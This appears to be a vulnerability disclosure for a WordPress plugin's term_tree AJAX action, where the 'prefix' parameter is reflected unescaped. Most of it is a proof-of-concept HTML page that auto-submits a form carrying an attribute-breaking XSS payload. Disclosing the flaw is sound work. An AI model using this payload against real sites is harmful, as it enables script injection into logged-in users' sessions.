The plugin does not escape the prefix parameter before outputting it back in an attribute when using the term_tree AJAX action (available to any authenticated users), leading to a Reflected Cross-Site Scripting issue
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="term_tree" />
<input type="hidden" name="prefix" value='xxxxxx" onmouseover=alert(/XSS/) test="' />
<input type="hidden" name="name" value="Uncategorizedory" />
<input type="hidden" name="widget_id" value="1" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>